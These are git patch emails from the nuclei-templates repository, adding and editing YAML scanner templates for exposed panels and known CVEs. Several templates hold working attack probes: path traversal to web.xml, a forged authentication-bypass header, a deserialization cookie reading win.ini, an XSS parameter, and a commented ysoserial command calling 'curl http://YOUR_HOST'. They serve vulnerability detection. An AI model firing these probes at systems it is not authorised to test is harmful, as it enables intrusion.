a/exposed-panels/zoho-manageengine-adaudit.yaml +++ b/exposed-panels/zoho-manageengine-adaudit.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+-+ADManager+Plus%22 - tags: panel + tags: panel,zoho requests: - method: GET @@ -17,6 +17,7 @@ requests: - type: word words: - 'ManageEngine - ADManager Plus' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/exposed-panels/zoho-manageengine-adselfservice-plus.yaml b/exposed-panels/zoho-manageengine-adselfservice-plus.yaml index ad40e711ab..551357ff34 100644 --- a/exposed-panels/zoho-manageengine-adselfservice-plus.yaml +++ b/exposed-panels/zoho-manageengine-adselfservice-plus.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22ADSelfService+Plus%22 - tags: panel + tags: panel,zoho requests: - method: GET @@ -17,6 +17,7 @@ requests: - type: word words: - 'ADSelfService Plus' + - type: status status: - 200 diff --git a/exposed-panels/zoho-manageengine-analyticsplus.yaml b/exposed-panels/zoho-manageengine-analyticsplus.yaml index b6d6d15b23..85ffbcb133 100644 --- a/exposed-panels/zoho-manageengine-analyticsplus.yaml +++ b/exposed-panels/zoho-manageengine-analyticsplus.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://fofa.so/result?qbase64=YXBwPSJaT0hPLea1gemHj%2BeuoeeQhiI%3D - tags: panel + tags: panel,zoho requests: - method: GET @@ -17,6 +17,7 @@ requests: - type: word words: - 'ManageEngine Analytics Plus' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/exposed-panels/zoho-manageengine-apex-helpdesk.yaml b/exposed-panels/zoho-manageengine-apex-helpdesk.yaml index d62864cc40..2339f18d3d 100644 --- a/exposed-panels/zoho-manageengine-apex-helpdesk.yaml +++ b/exposed-panels/zoho-manageengine-apex-helpdesk.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22APEX+IT+Help+Desk%22 - tags: panel + tags: panel,zoho requests: - method: GET @@ -17,6 +17,7 @@ requests: - type: word words: - 'APEX IT Help Desk' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/exposed-panels/zoho-manageengine-applications-manager.yaml b/exposed-panels/zoho-manageengine-applications-manager.yaml index 9fa08b817a..36dd80f6be 100644 --- a/exposed-panels/zoho-manageengine-applications-manager.yaml +++ b/exposed-panels/zoho-manageengine-applications-manager.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://fofa.so/result?qbase64=YXBwPSJaT0hPLU1hbmFnZUVuZ2luZS1BcHBsaWNhdGlvbnMtTWFuYWdlciI%3D - tags: panel + tags: panel,zoho requests: - method: GET @@ -17,6 +17,7 @@ requests: - type: word words: - 'Applications Manager Login Screen' + - type: status status: - 200 diff --git a/exposed-panels/zoho-manageengine-assetexplorer.yaml b/exposed-panels/zoho-manageengine-assetexplorer.yaml index 218278bb91..96458c1258 100644 --- a/exposed-panels/zoho-manageengine-assetexplorer.yaml +++ b/exposed-panels/zoho-manageengine-assetexplorer.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+AssetExplorer%22 - tags: panel + tags: panel,zoho requests: - method: GET @@ -17,6 +17,7 @@ requests: - type: word words: - 'ManageEngine AssetExplorer' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/exposed-panels/zoho-manageengine-desktop.yaml b/exposed-panels/zoho-manageengine-desktop.yaml index 402f49b29e..1d1e412802 100644 --- a/exposed-panels/zoho-manageengine-desktop.yaml +++ b/exposed-panels/zoho-manageengine-desktop.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+Desktop+Central+10%22 - tags: panel + tags: panel,zoho requests: - method: GET @@ -17,6 +17,7 @@ requests: - type: word words: - 'ManageEngine Desktop Central 10' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/exposed-panels/zoho-manageengine-opmanager.yaml b/exposed-panels/zoho-manageengine-opmanager.yaml index 2da154b75d..e8bf39dd8a 100644 --- a/exposed-panels/zoho-manageengine-opmanager.yaml +++ b/exposed-panels/zoho-manageengine-opmanager.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22OpManager+Plus%22 - tags: panel + tags: panel,zoho requests: - method: GET @@ -17,6 +17,7 @@ requests: - type: word words: - '

OpManager Plus' + - type: status status: - 200 diff --git a/exposed-panels/zoho-manageengine-servicedesk.yaml b/exposed-panels/zoho-manageengine-servicedesk.yaml index 04a5549333..36b2aa1903 100644 --- a/exposed-panels/zoho-manageengine-servicedesk.yaml +++ b/exposed-panels/zoho-manageengine-servicedesk.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22 - tags: panel + tags: panel,zoho requests: - method: GET @@ -17,6 +17,7 @@ requests: - type: word words: - 'ManageEngine ServiceDesk Plus' + - type: status status: - 200 diff --git a/exposed-panels/zoho-manageengine-supportcenter.yaml b/exposed-panels/zoho-manageengine-supportcenter.yaml index 23613106bd..1e04db2ff8 100644 --- a/exposed-panels/zoho-manageengine-supportcenter.yaml +++ b/exposed-panels/zoho-manageengine-supportcenter.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+SupportCenter+Plus%22 - tags: panel + tags: panel,zoho requests: - method: GET @@ -17,6 +17,7 @@ requests: - type: word words: - 'ManageEngine SupportCenter Plus' + - type: status status: - - 200 + - 200 \ No newline at end of file From c974b82c3d71b67612d083687bf9f2fd56e8754a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 29 Jun 2021 12:09:21 +0000 Subject: [PATCH 0147/4083] Auto Update README [Tue Jun 29 12:09:21 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 6bfa860b31..91da99e2f7 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 366 | vulnerabilities | 200 | exposed-panels | 160 | +| cves | 366 | vulnerabilities | 200 | exposed-panels | 170 | | takeovers | 68 | exposures | 106 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1366 files**. +**120 directories, 1376 files**. From 8b0b2a169dd8014f401a1b30afde59558380e660 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 29 Jun 2021 18:02:33 +0530 Subject: [PATCH 0148/4083] Update CVE-2021-35464.yaml --- cves/2021/CVE-2021-35464.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml index be87b9b417..d8b5d29019 100644 --- a/cves/2021/CVE-2021-35464.yaml +++ b/cves/2021/CVE-2021-35464.yaml @@ -1,4 +1,4 @@ -id: CVE-2021-24237 +id: CVE-2021-35464 info: author: madrobot From b42b911384359a442b330ed374faca8ff904eaba Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Jun 2021 21:33:40 +0530 Subject: [PATCH 0149/4083] Create adobe-experience-manager-login.yaml --- .../adobe-experience-manager-login.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/adobe-experience-manager-login.yaml diff --git a/exposed-panels/adobe-experience-manager-login.yaml b/exposed-panels/adobe-experience-manager-login.yaml new file mode 100644 index 0000000000..2c1f158cea --- /dev/null +++ b/exposed-panels/adobe-experience-manager-login.yaml @@ -0,0 +1,23 @@ +id: adobe-experience-manager-login + +info: + name: Adobe-Experience-Manager + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + tags: panel,aem + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/granite/core/content/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'AEM Sign In' + + - type: status + status: + - 200 From 6846e0f0056fdce6709169c4164471c2e49021a6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 29 Jun 2021 18:42:24 +0000 Subject: [PATCH 0150/4083] Auto Update README [Tue Jun 29 18:42:24 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 91da99e2f7..804d9ba71f 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 366 | vulnerabilities | 200 | exposed-panels | 170 | +| cves | 366 | vulnerabilities | 200 | exposed-panels | 171 | | takeovers | 68 | exposures | 106 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1376 files**. +**120 directories, 1377 files**. From 52e92814a891dece67163e42809bafa2eb433fd1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 29 Jun 2021 19:15:03 +0000 Subject: [PATCH 0151/4083] Auto Update README [Tue Jun 29 19:15:03 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 804d9ba71f..8803956079 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 366 | vulnerabilities | 200 | exposed-panels | 171 | -| takeovers | 68 | exposures | 106 | technologies | 107 | +| takeovers | 69 | exposures | 106 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1377 files**. +**120 directories, 1378 files**. From 498586e85489d0c5fc8cc2760d5baf0959c93f5e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 30 Jun 2021 03:01:13 +0530 Subject: [PATCH 0152/4083] Added additional matcher and full exploit chain details --- cves/2021/CVE-2021-35464.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml index d8b5d29019..5b884fab3a 100644 --- a/cves/2021/CVE-2021-35464.yaml +++ b/cves/2021/CVE-2021-35464.yaml @@ -14,6 +14,9 @@ requests: path: - '{{BaseURL}}/openam/oauth2/..;/ccversion/Version' + # '{{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession=' + # java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' + matchers-condition: and matchers: - type: status @@ -22,7 +25,10 @@ requests: - type: word words: - - "X-OPNET-Transaction-Trace" - "Set-Cookie: JSESSIONID=" part: header - condition: and + + - type: word + words: + - "Version Information -" + part: body \ No newline at end of file From a3299759f379db2fdad028ce3afac4d32e76bafe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 29 Jun 2021 21:33:03 +0000 Subject: [PATCH 0153/4083] Auto Update README [Tue Jun 29 21:33:03 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8803956079..4aa47f8693 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 366 | vulnerabilities | 200 | exposed-panels | 171 | +| cves | 367 | vulnerabilities | 200 | exposed-panels | 171 | | takeovers | 69 | exposures | 106 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1378 files**. +**120 directories, 1379 files**. From 96fc7bb3413ed7c741f40035b814af5a2661f52b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 30 Jun 2021 03:26:01 +0530 Subject: [PATCH 0154/4083] more strict matchers --- cves/2020/CVE-2020-12116.yaml | 10 ++++++---- exposures/configs/server-private-keys.yaml | 6 ++++++ 2 files changed, 12 insertions(+), 4 deletions(-) diff --git a/cves/2020/CVE-2020-12116.yaml b/cves/2020/CVE-2020-12116.yaml index 638de265c2..32023cb990 100644 --- a/cves/2020/CVE-2020-12116.yaml +++ b/cves/2020/CVE-2020-12116.yaml @@ -32,8 +32,10 @@ requests: regex: - "(?m)/cachestart/.*/jquery/" + req-condition: true matchers: - - type: word - words: - - "BEGIN RSA PRIVATE KEY" - part: body \ No newline at end of file + - type: dsl + dsl: + - 'contains(body_2, "BEGIN RSA PRIVATE KEY")' + - 'status_code_2 == 200' + condition: and \ No newline at end of file diff --git a/exposures/configs/server-private-keys.yaml b/exposures/configs/server-private-keys.yaml index 4366f90209..3bfc5c6d13 100644 --- a/exposures/configs/server-private-keys.yaml +++ b/exposures/configs/server-private-keys.yaml @@ -45,3 +45,9 @@ requests: - type: status status: - 200 + + - type: dsl + dsl: + - '!contains(body_2, " Date: Wed, 30 Jun 2021 01:12:12 -0600 Subject: [PATCH 0155/4083] Add Marmoset Viewer XSS Vulnerability Reference: https://wordpress.org/plugins/marmoset-viewer/#developers --- .../wp-plugin-marmoset-viewer-xss.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml diff --git a/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml b/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml new file mode 100644 index 0000000000..c57477d47e --- /dev/null +++ b/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml @@ -0,0 +1,22 @@ +id: wp-plugin-marmoset-viewer-xss + +info: + name: Wordpress Plugin Marmoset Viewer XSS + author: johnjhacking + severity: medium + tags: xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://" + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body From 1afa10262003f5601cf9051b1a19d148dcc09a88 Mon Sep 17 00:00:00 2001 From: Keith Date: Wed, 30 Jun 2021 16:30:56 +0800 Subject: [PATCH 0156/4083] Add CVE-2018-8715.yaml - AppWeb authentication bypass --- cves/2018/CVE-2018-8715.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2018/CVE-2018-8715.yaml diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml new file mode 100644 index 0000000000..ab9799d2b9 --- /dev/null +++ b/cves/2018/CVE-2018-8715.yaml @@ -0,0 +1,33 @@ +id: CVE-2018-8715 + +info: + name: AppWeb Authentication Bypass vulnerability + author: milo2012 + severity: high + description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types. + tags: cve,cve2018,appweb,bypass + reference: | + - https://github.com/embedthis/appweb/issues/610 + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Connection: close + Authorization: Digest username=admin + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '' + part: body From b3c580d290d959403ab8dfebc061ad6affe6819c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 30 Jun 2021 15:34:58 +0530 Subject: [PATCH 0157/4083] Update CVE-2018-8715.yaml --- cves/2018/CVE-2018-8715.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml index ab9799d2b9..fb2cf93537 100644 --- a/cves/2018/CVE-2018-8715.yaml +++ b/cves/2018/CVE-2018-8715.yaml @@ -5,7 +5,7 @@ info: author: milo2012 severity: high description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types. - tags: cve,cve2018,appweb,bypass + tags: cve,cve2018,appweb,auth-bypass reference: | - https://github.com/embedthis/appweb/issues/610 From 9f6b6aeb8925f6da3c9b8401ef49d2f4084dacc1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 30 Jun 2021 15:36:25 +0530 Subject: [PATCH 0158/4083] Update jolokia-heap-info-disclosure.yaml --- vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml index 050597b3a5..840be8e54a 100644 --- a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml +++ b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml @@ -4,7 +4,7 @@ info: name: Jolokia Java Heap Information Disclosure author: milo2012 severity: info - tags: jolokia + tags: jolokia,disclosure requests: - raw: From e04b943dcec8fb5ee3861e5b78a994371a93946d Mon Sep 17 00:00:00 2001 From: "Petko D. Petkov" Date: Wed, 30 Jun 2021 10:17:58 +0000 Subject: [PATCH 0159/4083] Detect javascript environment configs. --- exposures/configs/javascript-env.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposures/configs/javascript-env.yaml diff --git a/exposures/configs/javascript-env.yaml b/exposures/configs/javascript-env.yaml new file mode 100644 index 0000000000..752638acf0 --- /dev/null +++ b/exposures/configs/javascript-env.yaml @@ -0,0 +1,27 @@ +id: javascript-env + +info: + name: JavaScript Environment Detection + author: pdp + severity: low + description: Detects common JavaScript environment configuration files. + tags: javascript,config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/env.js" + - "{{BaseURL}}/env.development.js" + - "{{BaseURL}}/env.production.js" + - "{{BaseURL}}/env.test.js" + - "{{BaseURL}}/env.dev.js" + - "{{BaseURL}}/env.prod.js" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - "application/javascript" \ No newline at end of file From 9bd750e28e9355fb5fe8de0b6fdcbc2d650dfdcc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 30 Jun 2021 16:07:25 +0530 Subject: [PATCH 0160/4083] Update javascript-env.yaml --- exposures/configs/javascript-env.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/exposures/configs/javascript-env.yaml b/exposures/configs/javascript-env.yaml index 752638acf0..65774d92cc 100644 --- a/exposures/configs/javascript-env.yaml +++ b/exposures/configs/javascript-env.yaml @@ -1,10 +1,10 @@ id: javascript-env info: - name: JavaScript Environment Detection + name: JavaScript Environment Detection author: pdp severity: low - description: Detects common JavaScript environment configuration files. + description: Detects common JavaScript environment configuration files. tags: javascript,config,exposure requests: @@ -18,6 +18,7 @@ requests: - "{{BaseURL}}/env.prod.js" matchers-condition: and matchers: + - type: status status: - 200 From 9d8f8f8589491b7fea7cdcd5f4dd51437d6341cc Mon Sep 17 00:00:00 2001 From: Robbie Date: Wed, 30 Jun 2021 11:50:41 +0100 Subject: [PATCH 0161/4083] Create CVE-2013-3827.yaml --- cves/2013/CVE-2013-3827.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2013/CVE-2013-3827.yaml diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml new file mode 100644 index 0000000000..d8465e8d2c --- /dev/null +++ b/cves/2013/CVE-2013-3827.yaml @@ -0,0 +1,27 @@ +id: CVE-2013-3827 + +info: + name: CVE-2013-3827 + author: Random-Robbie + severity: medium + description: Javafaces LFI + +requests: + - method: GET + path: + - "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + matchers-condition: and + matchers: + - type: word + words: + - "web-app version" + part: body From f78452e8087faac9a1fbd566d85b315b38f6ff03 Mon Sep 17 00:00:00 2001 From: Keith Date: Wed, 30 Jun 2021 19:32:59 +0800 Subject: [PATCH 0162/4083] Add CVE-2017-9822.yaml - DotNetNuke Cookie Deserialization Remote Code Execution (RCE) --- cves/2017/CVE-2017-9822.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2017/CVE-2017-9822.yaml diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml new file mode 100644 index 0000000000..62d48773dc --- /dev/null +++ b/cves/2017/CVE-2017-9822.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-9822 + +info: + name: DotNetNuke Cookie Deserialization Remote Code Execution (RCE) + author: milo2012 + severity: high + description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE). + tags: cve,cve2017,dotnetnuke,bypass + reference: https://github.com/murataydemir/CVE-2017-9822 + +requests: + - raw: + - | + GET /__ HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 + Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 + Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 + Accept-Encoding: gzip, deflate + X-Requested-With: XMLHttpRequest + Connection: close + Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini + + matchers-condition: and + matchers: + - type: word + words: + - '[extensions]' + part: body From 8490fe60ca510bae5c595f4fe9f2c2a816e1104b Mon Sep 17 00:00:00 2001 From: Keith Date: Wed, 30 Jun 2021 19:35:01 +0800 Subject: [PATCH 0163/4083] Add CVE-2017-9822.yaml - DotNetNuke Cookie Deserialization Remote Code Execution (RCE) --- cves/2017/CVE-2017-9822.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml index 62d48773dc..3204b86686 100644 --- a/cves/2017/CVE-2017-9822.yaml +++ b/cves/2017/CVE-2017-9822.yaml @@ -4,7 +4,7 @@ info: name: DotNetNuke Cookie Deserialization Remote Code Execution (RCE) author: milo2012 severity: high - description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE). + description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE) tags: cve,cve2017,dotnetnuke,bypass reference: https://github.com/murataydemir/CVE-2017-9822 From 7c39ab8c791b39f1afbacf36fd0d7fae1d402c74 Mon Sep 17 00:00:00 2001 From: "Petko D. Petkov" Date: Wed, 30 Jun 2021 12:03:47 +0000 Subject: [PATCH 0164/4083] Check if json. --- misconfiguration/aem/aem-querybuilder-json-servlet.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/misconfiguration/aem/aem-querybuilder-json-servlet.yaml b/misconfiguration/aem/aem-querybuilder-json-servlet.yaml index 48870c0894..18210457c8 100644 --- a/misconfiguration/aem/aem-querybuilder-json-servlet.yaml +++ b/misconfiguration/aem/aem-querybuilder-json-servlet.yaml @@ -18,6 +18,11 @@ requests: status: - 200 + - type: word + words: + - "application/json" + part: header + - type: word words: - 'success' From 6d12b9bb6bf38b3ff8ff91e26c21f46f99afc667 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 30 Jun 2021 17:53:27 +0530 Subject: [PATCH 0165/4083] Added additional matcher --- exposures/configs/javascript-env.yaml | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/exposures/configs/javascript-env.yaml b/exposures/configs/javascript-env.yaml index 65774d92cc..4d218b9539 100644 --- a/exposures/configs/javascript-env.yaml +++ b/exposures/configs/javascript-env.yaml @@ -1,7 +1,7 @@ id: javascript-env info: - name: JavaScript Environment Detection + name: JavaScript Environment Config author: pdp severity: low description: Detects common JavaScript environment configuration files. @@ -16,13 +16,23 @@ requests: - "{{BaseURL}}/env.test.js" - "{{BaseURL}}/env.dev.js" - "{{BaseURL}}/env.prod.js" + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: header words: - - "application/javascript" \ No newline at end of file + - "application/javascript" + + - type: word + part: body + words: + - "module.exports" + - "const audience" + - "const domain" + condition: or From 5affbf47b3998cdcd43a52f9a21257081ba6b162 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 30 Jun 2021 18:24:34 +0530 Subject: [PATCH 0166/4083] misc changes --- .../wordpress/wp-plugin-marmoset-viewer-xss.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml b/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml index c57477d47e..64f52771fa 100644 --- a/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml +++ b/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml @@ -4,12 +4,14 @@ info: name: Wordpress Plugin Marmoset Viewer XSS author: johnjhacking severity: medium - tags: xss + tags: wordpress,xss + reference: https://wordpress.org/plugins/marmoset-viewer/#developers requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://" + - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://" + matchers-condition: and matchers: - type: status @@ -18,5 +20,7 @@ requests: - type: word words: - - "" + - "" + - "Marmoset Viewer" part: body + condition: and \ No newline at end of file From 199ee498f80a94f15c00d8dfcedf22442bb069b2 Mon Sep 17 00:00:00 2001 From: pdparchitect Date: Wed, 30 Jun 2021 13:55:21 +0100 Subject: [PATCH 0167/4083] Update javascript-env.yaml Added additional matchers to broaden detection --- exposures/configs/javascript-env.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/exposures/configs/javascript-env.yaml b/exposures/configs/javascript-env.yaml index 4d218b9539..5b7608c025 100644 --- a/exposures/configs/javascript-env.yaml +++ b/exposures/configs/javascript-env.yaml @@ -35,4 +35,10 @@ requests: - "module.exports" - "const audience" - "const domain" + - "NODE_ENV" + - "LOG_LEVEL" + - "TOKEN" + - "KEY" + - "PASSWORD" + - "VERSION" condition: or From 7e5242e3f5f98244b6deaf599f8d2f4ff898e1ba Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 30 Jun 2021 12:55:54 +0000 Subject: [PATCH 0168/4083] Auto Update README [Wed Jun 30 12:55:54 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4aa47f8693..7afb46af0f 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 367 | vulnerabilities | 200 | exposed-panels | 171 | +| cves | 367 | vulnerabilities | 201 | exposed-panels | 171 | | takeovers | 69 | exposures | 106 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1379 files**. +**120 directories, 1380 files**. From f97ae5ceba6cd08d494dbaa18066e1b89db6db7b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 30 Jun 2021 19:29:26 +0530 Subject: [PATCH 